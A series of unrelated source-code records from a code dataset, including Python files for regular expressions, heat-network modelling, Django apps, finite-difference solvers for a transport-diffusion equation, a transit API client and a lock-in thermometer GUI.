message))\n#Agent A****** shot Agent B******\n\n\n###############################\n# VERBOSE Reg expressions\n###############################\n\n#sometimes reg expressions can get really long\n#we can use verbose mode to combat this\n#this just means we use a multi line string and use comments to describe\n#need to \n\n\nre.compile('\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d')\n\n#after verbose\n\nverbosePhoneRegex = re.compile(r''' \n \\d\\d\\d #area code\n - #dash 1\n \\d\\d\\d #digits 4-6\n - #dash 2\n \\d\\d\\d\\d #digits 8-10\n ''', re.VERBOSE) # need to include re.VERBOSE param\n\n###############################\n# RegEx multiple params usage \n###############################\n\n#separte options with | character in param 2\n#only used in the 're' module\n\nverbosePhoneRegex = re.compile(r''' \n \\d\\d\\d #area code\n - #dash 1\n \\d\\d\\d #digits 4-6\n - #dash 2\n \\d\\d\\d\\d #digits 8-10\n ''', re.VERBOSE | re.IGNORECASE | re.DOTALL) # need to include re.VERBOSE param\n\n\n\n\n\n","sub_path":"Python/RegularExpressions.py","file_name":"RegularExpressions.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"631309775","text":"\nclass HeatNetworks():\n '''Holds a bunch of heat networks'''\n def __init__(self, industry_consumption, residential_consumption):\n self.industrial_network = Network(industry_consumption)\n self.residential_network = Network(residential_consumption)\n self.unassigned_producers = []\n self.unassigned_heat = 0.0\n\n\n def add_producer(self, producer, heat):\n '''\n Assigns a producer to one of the networks\n\n Params:\n producer (dict[str,str]): A producer as listed in the heaters_and_chp config\n heat (float): Amount of heat produced in TJ\n '''\n if producer.network == 'residential':\n self.residential_network.add(heat)\n elif producer.network == 'industrial':\n self.industrial_network.add(heat)\n else:\n self.unassigned_producers.append(producer)\n self.unassigned_heat += heat\n\n\n def assign_flexible_producers(self):\n '''\n Generates tuples of producer, sector and the share of energy to shift to that sector\n '''\n share_for_ind, share_for_res = self.calculate_shares()\n\n for producer in self.unassigned_producers:\n yield (producer, 'residential', share_for_res)\n yield (producer, 'industrial', share_for_ind)\n\n\n def calculate_shares(self):\n '''\n Calculates the shares in which the flexible producers should be split up according to the\n deficits in the heat networks.\n When the shares can't be calculated, a 50/50 split is returned.\n\n Returns:\n (float, float): The share of flexible heat to go to industry, and the share to go to\n residential.\n '''\n if not self.unassigned_heat:\n return (0.5, 0.5)\n\n share_for_res = self.residential_network.deficit() / self.unassigned_heat\n share_for_ind = self.industrial_network.deficit() / self.unassigned_heat\n\n if share_for_res == 0.0 and share_for_ind == 0.0:\n return (0.5, 0.5)\n\n if not share_for_res + share_for_ind == 1.0:\n share_for_ind, share_for_res = HeatNetworks.warn_rescale(share_for_ind, share_for_res)\n\n return (share_for_ind, share_for_res)\n\n\n @staticmethod\n def warn_rescale(share_one, share_two):\n '''Returns a tuple of the rescaled shares (they should now sum to 1.0)'''\n print('\\033[93mUnassigned heat from flexible producers does not match heat deficit in ' +\n f'Final Consumption ({round(share_one + share_two, 2) * 100}%)\\033[0m')\n\n return (share_one / (share_one + share_two), share_two / (share_one + share_two))\n\n\nclass Network():\n '''Represents a heat network for e.g. residential or industry'''\n\n def __init__(self, heat_consumption=0.0):\n self.heat_supply = 0.0\n self.heat_consumption = heat_consumption\n\n\n def add(self, heat_supply):\n self.heat_supply += heat_supply\n\n\n def deficit(self):\n deficit = self.heat_consumption - self.heat_supply\n return deficit if deficit >= 0 else 0\n","sub_path":"tools/energy_balance_generator/etm_tools/energy_balance_operations/heat_network.py","file_name":"heat_network.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"42464158","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='CardModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=52)),\n ('weight', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='CardSubmissionModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('submission', models.ManyToManyField(to='Ranking.CardModel')),\n ],\n ),\n migrations.CreateModel(\n name='MatteModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=52)),\n ('description', models.CharField(max_length=240)),\n ('submissions', models.ManyToManyField(to='Ranking.CardSubmissionModel')),\n ],\n ),\n migrations.CreateModel(\n name='Themes',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=52)),\n ('description', models.CharField(max_length=240)),\n ],\n ),\n migrations.AddField(\n model_name='mattemodel',\n name='themes',\n field=models.ManyToManyField(to='Ranking.Themes'),\n ),\n ]\n","sub_path":"Neighborhoods/Ranking/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"562792304","text":"import os, glob\n\nDATA_DIR = '/home/chicm/ml/kgdata/tianchi'\n\nids = []\nfor i in range(5):\n filenames = glob.glob(DATA_DIR+'/test_subset'+str(i).zfill(2) + '/*.mhd')\n for fn in filenames:\n ids.append(fn.split('/')[-1].split('.')[0])\n\nprint(ids)\nwith open('sample_submission.csv', 'w') as f:\n header = 'seriesuid,coordX,coordY,coordZ,probablity\\n'\n f.write(header)\n for seriesuid in ids:\n line = '{},0,0,0,0.5\\n'.format(seriesuid)\n f.write(line)","sub_path":"create_tc_sample_submission.py","file_name":"create_tc_sample_submission.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"270661325","text":"from django.conf.urls import url, include\nfrom django.contrib.auth.decorators import login_required\n\nfrom apps.tenant.views import Dashboard\n\n\nurlpatterns = [\n url(r'^$', login_required(Dashboard.as_view()), name='index'),\n url(r'^cliente/', include('apps.cliente.urls', namespace='cliente')),\n url(r'^conductor/', include('apps.conductor.urls', namespace='conductor')),\n url(r'^vehiculo/', include('apps.vehiculo.urls', namespace='vehiculo')),\n url(r'^ruta/', include('apps.ruta.urls', namespace='ruta')),\n url(r'^planilla/', include('apps.planilla.urls', namespace='planilla')),\n]\n","sub_path":"scr/dashboard_urls.py","file_name":"dashboard_urls.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"598729543","text":"import time \n\nimport mpi_learn.mpi.manager as mm\nimport mpi_learn.train.model as model\n\nclass ProcBlock(object):\n \"\"\"\n This class represents a block of processes that run model training together.\n\n Attributes:\n comm_world: MPI communicator with all processes.\n Used to communicate with process 0, the coordinator\n comm_block: MPI communicator with the processes in this block.\n Rank 0 is the master, other ranks are workers.\n algo: MPI Algo object\n data: MPI Data object\n device: string indicating which device (cpu or gpu) should be used\n epochs: number of training epochs\n train_list: list of training data files\n val_list: list of validation data files\n callbacks: list of callback objects\n \"\"\"\n\n def __init__(self, comm_world, comm_block, algo, data,\n epochs, train_list, val_list, callbacks=None):\n self.comm_world = comm_world\n self.comm_block = comm_block\n self.algo = algo\n self.data = data\n self.device = device\n self.epochs = epochs\n self.train_list = train_list\n self.val_list = val_list\n self.callbacks = callbacks\n\n def wait_for_model(self):\n \"\"\"\n Blocks until the parent sends a JSON string\n indicating the model that should be trained.\n \"\"\"\n model_str = self.comm_world.Recv(source=0, tag='json') # note: will not work\n return model_str\n\n def train_model(self, model_json):\n model_builder = model.ModelFromJsonTF(self.comm_block, # note: will not work\n json_str=model_json, device_name=self.device)\n manager = mm.MPIManager(self.comm_block, self.data, self.algo, model_builder,\n self.epochs, self.train_list, self.val_list, callbacks=self.callbacks)\n if self.comm_block.Get_rank() == 0:\n histories = manager.process.train()\n print(histories)\n return histories['0']['val_loss'][-1]\n\n def send_result(self, result):\n self.comm_world.isend(result, dest=0, tag='result') # note: will not work\n\n def run(self):\n \"\"\"\n Awaits instructions from the parent to train a model.\n Then trains it and returns the loss to the parent.\n \"\"\"\n while True:\n cur_model = self.wait_for_model()\n fom = self.train_model(cur_model)\n self.send_result(fom)\n","sub_path":"proc_block.py","file_name":"proc_block.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"156440048","text":"from django.shortcuts import render\nfrom .forms import EnseignantForm,EnseignantForm2\nfrom .models import Enseignant\n# Create your views here.\ndef enseignantF(request):\n form = EnseignantForm2(request.POST or None)\n if form.is_valid():\n form.save()\n form = EnseignantForm2\n\n context = {\n 'form': form\n }\n return render(request, 'staff/enseignantFo.html', context)\ndef detail_enseignant(request,cid):\n e=Enseignant.objects.get(pk=cid)\n context={'en':e}\n return render(request,'staff/detail.enseignant.html',context)\n","sub_path":"staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"172276673","text":"########## Ma323 - Projet : Equation de transport-diffusion ##############\r\n### Cyrine Grar / David Karalekian / Emmanuel Odenya / Emerick Perrin #####\r\n\r\n''' Même résolution avec une nouvelle condition initiale'''\r\n\r\n### Imports\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n## Valeurs test\r\n\r\nV = 1\r\nnu = 1/20\r\nh = 0.05\r\ntau = 0.0025\r\n'''Les deux cas que nous n'affichons pas'''\r\n#h = 0.2\r\n#tau = 0.5\r\n\r\n#h = 0.1\r\n#tau = 0.05\r\n\r\nx0 = -10\r\nxfin = 10\r\n\r\nN = int((xfin - x0)/h)\r\n\r\nc = nu*tau/h**2\r\nd = V*tau/h\r\n\r\nTmin = 0\r\nTmax = 4\r\n\r\n### Fonctions \r\n\r\ndef matriceM(a, b, c):\r\n \"\"\"Construit une matrice carrée de taille N, tridiagonale.\r\n Le coefficient sur la diagonale est a \"\"\"\r\n A = a*np.eye(N)\r\n for i in range(N-1):\r\n A[i, i+1] = b\r\n A[i+1, i] = c\r\n return A\r\n\r\n\r\ndef U0(x):\r\n res = np.exp(-(x-2)**2) + np.exp(-(x+2)**2)\r\n return res\r\n\r\n\r\n### Schéma explicite centré\r\n\r\n# Mec = matriceM(N, 1-2c, c-d/2, d/2+c)\r\n\r\nMec = matriceM(1 - 2*c, c-d/2, d/2+c)\r\n\r\ndef SolExpliciteC(h, tau, Mec):\r\n \"\"\" Dans le schéma explicite centré U_n+1 = Mec U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = Mec@U[ i , : ]\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\n\r\nUe, Te, Xe, ue = SolExpliciteC(h, tau, Mec)\r\n\r\nplt.plot(Xe, Ue[0, :], label = 't=0', color='b')\r\nplt.plot(Xe, ue, label = 't=2', color='r')\r\nplt.plot(Xe, Ue[-1, :], label = 't=4', color='g')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Explicite centré h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma explicite décentré amont\r\n\r\n# Med = matriceM(N, 1-2c-d, c, d+c)\r\n\r\nMed = matriceM(1 - 2*c -d, c, d+c)\r\n\r\ndef SolExpliciteD(h, tau, Med):\r\n \"\"\" Dans le schéma explicite décentré amont U_n+1 = Med U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = Med@U[ i , : ]\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUed, Ted, Xed, ued = SolExpliciteD(h, tau, Mec)\r\n\r\nplt.plot(Xed, Ued[0, :], label = 't=0', color='r')\r\nplt.plot(Xed, ued, label = 't=2', color='g')\r\nplt.plot(Xed, Ued[-1, :], label='t=4', color='b')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Explicite décentré amont h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma implicite centré\r\n\r\n# Mic = matriceM(N, 1+2c, -c+d/2, -c-d/2)\r\n\r\nMic = matriceM(1 + 2*c, -c + d/2, -c - d/2)\r\n\r\ndef SolImpliciteC(h, tau, Mic):\r\n \"\"\" Dans le schéma implicite centré Mic U_n+1 = U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(Mic, U[ i , : ])\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUi, Ti, Xi, ui = SolImpliciteC(h, tau, Mic)\r\n\r\nplt.plot(Xi, Ui[0, :], label = 't=0', color='b')\r\nplt.plot(Xi, ui, label = 't=2', color='r')\r\nplt.plot(Xi, Ui[-1, :], label = 't=4', color='g')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Implicite centré h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma implicite décentré amont\r\n\r\n# Mid = matriceM(N, 1+2c+d, -c, -c-d)\r\n\r\nMid = matriceM(1 + 2*c + d, -c, -c - d)\r\n\r\ndef SolImpliciteD(h, tau, Mid):\r\n \"\"\" Dans le schéma implicite décentré amont Mid U_n+1 = U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(Mid, U[ i , : ])\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUid, Tid, Xid, uid = SolImpliciteD(h, tau, Mid)\r\n\r\nplt.plot(Xid, Uid[0, :], label = 't=0', color='r')\r\nplt.plot(Xid, uid, label = 't=2', color='g')\r\nplt.plot(Xid, Uid[-1, :], label = 't=4', color='b')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Implicite décentré amont h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma Crank-Nicholson centré\r\n\r\n# CNcg = matriceM(N, 1+c, d/4-c/2, -c/2-d/4)\r\n# CNcd = matriceM(N, 1-c, c/2-d/4, d/4+c/2)\r\n\r\nCNcg = matriceM(1 + c, d/4 - c/2, -c/2 - d/4)\r\nCNcd = matriceM(1 - c, -d/4 + c/2, c/2 + d/4)\r\n\r\ndef SolCNc(h, tau, CNcg, CNcd):\r\n \"\"\" Dans le schéma Crank-Nicolson centré CNcg U_n+1 = CNcd U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(CNcg, CNcd@U[ i , : ])\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUcn, Tcn, Xcn, ucn = SolCNc(h, tau, CNcg, CNcd)\r\n\r\nplt.plot(Xcn, Ucn[0, :], label = 't=0', color='b')\r\nplt.plot(Xcn, ucn, label = 't=2', color='r')\r\nplt.plot(Xcn, Ucn[-1, :], label = 't=4', color='g')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Crank-Nicolson centré h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma Crank-Nicholson décentré amont\r\n\r\n# CNdg = matriceM(N, 1+c+d/2, -c/2, -c/2-d/2)\r\n# CNdd = matriceM(N, 1-c-d/2, c/2, c/2+d/2)\r\n\r\nCN_cg = matriceM(1 + c + d/2, - c/2, -c/2 - d/2)\r\nCN_cd = matriceM(1 - c - d/2, c/2, d/2 + c/2)\r\n\r\ndef SolCNd(h, tau, CN_cg, CN_cd):\r\n \"\"\" Dans le schéma Crank-Nicolson centré CNcg U_n+1 = CNcd U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(CN_cg, CN_cd@U[ i , : ])\r\n ud = U[ntdemi, : ]\r\n return U, T, X, ud\r\n\r\nU_cn, T_cn, X_cn, ud_cn = SolCNd(h, tau, CN_cg, CN_cd)\r\n\r\nplt.plot(X_cn, U_cn[0, :], label = 't=0', color='r')\r\nplt.plot(X_cn, ud_cn, label = 't=2', color='g')\r\nplt.plot(X_cn, U_cn[-1, :], label = 't=4', color='b')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Crank-Nicolson décentré amont h=0.05 tau=0.0025')\r\nplt.show()\r\n","sub_path":"Projet_Ma323_Code_V4_NewConditionInit.py","file_name":"Projet_Ma323_Code_V4_NewConditionInit.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"360869930","text":"from typing import Any, Dict, List, Optional, Sequence\nfrom digitransit.enums import Mode, RealtimeState\nimport json\nimport requests\nfrom datetime import datetime\n\nclass Stoptime:\n def __init__(self, scheduledArrival: int, realtimeArrival: int, arrivalDelay: int, scheduledDeparture: int, realtimeDeparture: int, departureDelay: int, realtime: bool, realtimeState: str, serviceDay: int, headsign: str, trip: Dict[str, Any]) -> None:\n self.scheduledArrival: datetime = datetime.fromtimestamp(serviceDay + scheduledArrival)\n self.realtimeArrival: datetime = datetime.fromtimestamp(serviceDay + realtimeArrival)\n self.arrivalDelay: int = arrivalDelay\n self.scheduledDeparture: datetime = datetime.fromtimestamp(serviceDay + scheduledDeparture)\n self.realtimeDeparture: datetime = datetime.fromtimestamp(serviceDay + realtimeDeparture)\n self.departureDelay: int = departureDelay\n self.realtime: bool = realtime\n self.realtimeState: RealtimeState = RealtimeState(realtimeState)\n self.headsign: str = headsign\n self.trip: Trip = Trip(**trip)\n\nclass Stop:\n def __init__(self, name: str, vehicleMode: str, stoptimesWithoutPatterns: Sequence[Dict[str, Any]]) -> None:\n self.name: str = name\n self.vehicleMode: Mode = Mode(vehicleMode)\n\n self.stoptimes = [Stoptime(**stoptime) for stoptime in stoptimesWithoutPatterns]\n\nclass Trip:\n def __init__(self, routeShortName: str) -> None:\n self.routeShortName: str = routeShortName\n\ndef get_stop_info(endpoint: str, stopcode: int, numberOfDepartures: Optional[int] = None) -> Stop:\n query = \"\"\"{\n stop(id: \"tampere:STOPID\") {\n name\n vehicleMode\n stoptimesWithoutPatternsNUMDEPARTS {\n scheduledArrival\n realtimeArrival\n arrivalDelay\n scheduledDeparture\n realtimeDeparture\n departureDelay\n realtime\n realtimeState\n serviceDay\n headsign\n trip {\n routeShortName\n }\n }\n }\n}\n\"\"\".replace(\"STOPID\", f\"{stopcode:04d}\").replace(\"NUMDEPARTS\", f\"(numberOfDepartures: {numberOfDepartures})\" if numberOfDepartures != None else \"\")\n\n jsonString = \"{\\\"query\\\": \" + json.dumps(query) + \"}\"\n\n response = requests.post(endpoint, jsonString, headers={\"content-type\": \"application/json\"})\n if not response.ok:\n raise RuntimeError(f\"Invalid response! Response below:\\n{response.content}\")\n\n d = json.loads(response.content)\n if d[\"data\"][\"stop\"] == None:\n raise ValueError(\"Invalid stopcode!\")\n return Stop(**d[\"data\"][\"stop\"])","sub_path":"digitransit/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449981122","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUse the lock-in for thermometer (resistive sensor) read-out.\nOptionally, adjust sine-out amplitude to keep constant sensor excitation.\n\nCreated on Wed Dec 16 17:13:15 2015\n\n@author: wisp10\n\"\"\"\n\nimport time\n\nfrom LabWidgets.Utilities import compileUi\ncompileUi('LockinThermometerUi2')\nimport LockinThermometerUi2 as Ui\n\nimport pyqtgraph as pg\nfrom PyQt4.QtGui import QWidget, QErrorMessage, QIcon \nfrom PyQt4.QtCore import QSettings, QTimer, QString\nfrom PyQt4.Qt import Qt\n\nfrom Calibration.CalibrationDatabase import ThermometerCalIds, getThermometerCalibration\n\nfrom Visa.SR830_New import SR830\nfrom Visa.VisaInstrument import CommunicationsError\nimport os.path\n\nfrom Zmq.Zmq import ZmqPublisher, RequestReplyThreadWithBindings\nfrom Zmq.Ports import LockInPubSub, LockInRequestReply\nfrom Zmq.Subscribers import HousekeepingSubscriber\n\n#import gc\n#gc.set_debug(gc.DEBUG_LEAK)\n\n\nclass LockinThermometerWidget(Ui.Ui_Form, QWidget):\n def __init__(self, parent=None):\n super(LockinThermometerWidget, self).__init__(parent)\n self.setupUi(self)\n self.setWindowTitle('Lockin Thermometer')\n self.serverThread = None\n self.timer = None\n self.Rthermometer = float('nan')\n\n axis = pg.DateAxisItem(orientation='bottom')\n self.plot = pg.PlotWidget(axisItems={'bottom': axis})\n self.plot.setBackground('w')\n self.plot.plotItem.showGrid(x=True, y=True)\n self.plot.addLegend()\n self.verticalLayout.addWidget(self.plot)\n self.curve = pg.PlotCurveItem(name='X', symbol='o', pen='b')\n self.plot.addItem(self.curve)\n self.clearPb.clicked.connect(self.clearData)\n self.clearData()\n self.plotYAxisCombo.currentIndexChanged.connect(self.updatePlot)\n \n self.sr830 = None\n self.runPb.clicked.connect(self.run)\n self.parameterItems = [self.attenuatorGainSb, self.sourceImpedanceSb, self.driveResistanceSb, self.leadResistanceSb, self.preampGainSb, self.sensorVoltageSb]\n self.savePb.clicked.connect(self.saveParameterSet)\n self.loadPb.clicked.connect(self.loadParameterSet)\n self.deletePb.clicked.connect(self.deleteParameterSet)\n self.attenuatorAttenuationSb.valueChanged.connect(self.updateAttenuatorGain)\n self.attenuatorGainSb.valueChanged.connect(self.updateAttenuatorAttenuation)\n self.sensorVoltageIndicator.setUnit('V')\n self.sensorCurrentIndicator.setUnit('A')\n self.sensorPowerIndicator.setUnit('W')\n\n sr830 = SR830(None)\n sr830.sensitivity.populateEnumComboBox(self.minSensitivityCombo)\n \n self.loadParameterSets()\n self.restoreSettings()\n self.hkSub = HousekeepingSubscriber(parent = self)\n self.hkSub.adrResistanceReceived.connect(self.collectAdrResistance)\n self.hkSub.start()\n self.adrResistanceIndicator.setUnit(u'Ω')\n self.adrResistanceIndicator.setPrecision(5)\n self.publisher = None\n \n combo = self.calibrationCombo\n for i, calId in enumerate(ThermometerCalIds):\n try:\n cal = getThermometerCalibration(calId)\n info = cal.info\n except Exception as e:\n import warnings\n warnings.warn('Calibration %s unavailable due to exception %s' % (calId, str(e))) \n combo.addItem(calId)\n combo.setItemData(i, info, Qt.ToolTipRole)\n \n self.selectCalibration()\n combo.currentIndexChanged.connect(self.selectCalibration)\n\n def startServerThread(self, port):\n if self.serverThread is not None:\n self.serverThread.stop()\n self.serverThread.wait(1000)\n del self.serverThread\n self.serverThread = None\n self.serverThread = RequestReplyThreadWithBindings(port, parent=self)\n boundWidgets = {'adjustExcitation': self.adjustExcitationCb, 'sensorVoltage':self.sensorVoltageSb, 'tolerance':self.toleranceSb, 'autoRanging': self.autoRangingCb}\n for name in boundWidgets:\n self.serverThread.bindToWidget(name, boundWidgets[name])\n #logger.info('Starting server thread')\n self.serverThread.start()\n\n def selectCalibration(self):\n calId = str(self.calibrationCombo.currentText())\n self.calibration = getThermometerCalibration(calId)\n\n def collectAdrResistance(self, R):\n self.Rthermometer = R\n self.adrResistanceIndicator.setValue(R)\n \n def updateAttenuatorGain(self, v):\n sb = self.attenuatorGainSb\n block = sb.blockSignals(True)\n sb.setValue(1./v)\n sb.blockSignals(block)\n \n def updateAttenuatorAttenuation(self, v):\n sb = self.attenuatorAttenuationSb\n block = sb.blockSignals(True)\n sb.setValue(1./v)\n sb.blockSignals(block)\n \n def saveParameterSet(self):\n s = QSettings()\n s.beginGroup('ParameterSets')\n name = self.configCombo.currentText()\n s.beginGroup(name)\n s.setValue('adjustExcitation', self.adjustExcitationCb.isChecked())\n s.setValue('sensorName', self.sensorNameLe.text())\n s.setValue('sr830Visa', self.visaCombo.currentText())\n s.setValue('autoRanging', self.autoRangingCb.isChecked())\n s.setValue('minSensitivity', self.minSensitivityCombo.currentCode())\n for item in self.parameterItems:\n s.setValue(item.objectName(), item.value())\n s.endGroup()\n s.endGroup()\n \n def loadParameterSet(self):\n s = QSettings()\n name = self.configCombo.currentText()\n s.beginGroup('ParameterSets')\n if not name in s.childGroups():\n dlg = QErrorMessage(self)\n dlg.setWindowTitle('Error')\n dlg.showMessage('No saved parameters available for %s' % name)\n return\n s.beginGroup(name)\n for item in self.parameterItems:\n item.setValue(s.value(item.objectName(), item.value(), type=float))\n self.adjustExcitationCb.setChecked(s.value('adjustExcitation', False, type=bool))\n self.sensorNameLe.setText(s.value('sensorName', '', type=QString))\n self.visaCombo.setCurrentIndex(self.visaCombo.findText(s.value('sr830Visa', 'GPIB0::12', type=QString)))\n self.autoRangingCb.setChecked(s.value('autoRanging', True, type=bool))\n self.minSensitivityCombo.setCurrentCodeSilently(s.value('minSensitivity', 0, type=int))\n s.endGroup()\n s.endGroup()\n \n def loadParameterSets(self):\n s = QSettings()\n s.beginGroup('ParameterSets')\n names = s.childGroups()\n self.configCombo.addItems(names)\n \n def deleteParameterSet(self):\n i = self.configCombo.currentIndex()\n name = self.configCombo.itemText(i) \n \n s = QSettings()\n s.beginGroup('ParameterSets')\n s.beginGroup(name)\n s.remove('')\n s.endGroup()\n s.endGroup()\n \n self.configCombo.removeItem(i)\n \n \n def closeEvent(self, event):\n if self.timer:\n self.timer.stop()\n \n self.saveSettings()\n self.hkSub.stop()\n self.hkSub.wait(1000)\n \n def restoreSettings(self):\n s = QSettings()\n #visa = s.value('visa', QString(), type=QString)\n #i = self.visaCombo.findText(visa)\n #elf.visaCombo.setCurrentIndex(i)\n self.configCombo.setCurrentIndex(self.configCombo.findText(s.value('parameterSet', '', type=QString)))\n if len(self.configCombo.currentText()):\n self.loadParameterSet()\n #self.sensorNameLe.setText(s.value('sensorName', '', type=QString))\n \n def saveSettings(self):\n s = QSettings()\n #s.setValue('visa', self.visaCombo.currentText())\n s.setValue('parameterSet', self.configCombo.currentText())\n #s.setValue('sensorName', self.sensorNameLe.text())\n \n def enableWidgets(self, enable):\n self.visaCombo.setEnabled(enable)\n self.attenuatorGroupBox.setEnabled(enable)\n self.seriesResistanceGroupBox.setEnabled(enable)\n self.preampGroupBox.setEnabled(enable)\n self.sensorNameLe.setEnabled(enable)\n self.loadPb.setEnabled(enable)\n self.savePb.setEnabled(enable)\n self.deletePb.setEnabled(enable)\n self.configCombo.setEnabled(enable)\n \n def run(self):\n if self.sr830 is not None:\n self.stop()\n else:\n self.start()\n\n def stop(self):\n self.timer.stop()\n self.timer = None\n self.sr830 = None \n self.runPb.setText('Start')\n self.enableWidgets(True)\n del self.publisher; self.publisher = None\n \n def sensorName(self):\n return str(self.sensorNameLe.text())\n \n def start(self):\n sensorName = self.sensorName()\n self.setWindowTitle('Lock-In Thermometer %s' % sensorName )\n setAppId(sensorName)\n \n if sensorName == 'BusThermometer':\n icon = QIcon('Icons/LockinThermometer_Bus.ico')\n elif sensorName == 'RuOx2005Thermometer':\n icon = QIcon('Icons/LockinThermometer_BoxOutside.ico')\n elif sensorName == 'BoxThermometer':\n icon = QIcon('Icons/LockinThermometer_BoxInside2.ico')\n else:\n icon = QIcon('Icons/LockinThermometer.ico')\n\n self.setWindowIcon(icon)\n\n visa = str(self.visaCombo.currentText())\n self.sr830 = SR830(visa)\n #self.sr830.debug = True\n\n self.sr830.readAll()\n self.sr830.sineOut.caching = False # Disable caching on this\n \n self.publisher = ZmqPublisher('LockinThermometer', LockInPubSub(sensorName))\n self.startServerThread(LockInRequestReply(sensorName))\n \n self.runPb.setText('Stop')\n self.timer = QTimer()\n self.timer.setInterval(1000)\n self.timer.timeout.connect(self.snapSignal)\n self.timer.start()\n self.enableWidgets(False)\n self.rangeChangedTime = 0\n self.exChangedTime = 0\n t = time.time()\n timeString = time.strftime('%Y%m%d-%H%M%S', time.localtime(t))\n dateString = time.strftime('%Y%m%d')\n sensorName = str(self.sensorNameLe.text())\n\n s = QSettings('WiscXrayAstro', application='ADR3RunInfo')\n path = str(s.value('runPath', '', type=str))\n fileName = os.path.join(path, '%s_%s.dat' % (sensorName, dateString))\n if not os.path.isfile(fileName): # Maybe create new file\n with open(fileName, 'a+') as f:\n f.write('#LockinThermometer.py\\n')\n f.write('#Date=%s\\n' % timeString)\n f.write('#SensorName=%s\\n' % sensorName)\n f.write('#SR830=%s\\n' % self.sr830.visaId())\n f.write('#AttenuatorGain=%f\\n' % self.attenuatorGainSb.value())\n 